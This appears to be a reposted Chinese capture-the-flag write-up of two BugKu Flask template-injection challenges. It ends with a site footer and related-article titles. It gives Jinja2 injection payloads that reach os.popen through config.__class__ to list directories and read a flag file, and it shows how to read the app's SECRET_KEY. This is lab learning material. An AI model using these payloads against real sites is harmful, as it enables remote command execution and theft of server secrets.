BugKu_web Simple_SSTI

Posted 独角授

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BugKu_web Simple_SSTI相关的知识,希望对你有一定的参考价值。

BugKu_web Simple_SSTI

Simple_SSTI_1

打开页面如图示,根据提示要找到一个flag的参数

先尝试构造payload,发现页面有所变化

再用F12大法瞅瞅,发现有一行提示,在flask中经常设置一个secret_key变量

查询后知道secret_key格式是config.SECRET_KEY,拿到flag!

Simple_SSTI_2

打开页面和1一样,说明是模板注入,而且构造的payload也被执行了

上传错误语句发现是python3.7的flask模板注入

在网上搜集相关资料,找到了一些payload

文件读写:

?flag=%20config.__class__.__init__.__globals__[%27os%27].popen(%27输入命令%20../文件名称/%27).read()%20

命令执行:

/?flag=%20config.__class__.__init__.__globals__[%27os%27].popen(%27输入命令%20../%27).read()%20

先执行ls查看命令,发现有好多文件夹

接下来就尝试查看app文件夹内容

然后查看app文件夹里的flag文件,拿到flag!

/?flag=%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20

以上是关于BugKu_web Simple_SSTI的主要内容,如果未能解决你的问题,请参考以下文章

BugKu_web Simple_SSTI

BugKuCTF_web1-7

BugKuCTF_web1-7

BugKu:Simple_SSTI(SSTI模板注入)

安全-Simple_SSTI1(BugkuCTF)

BugKu_web新手题8-9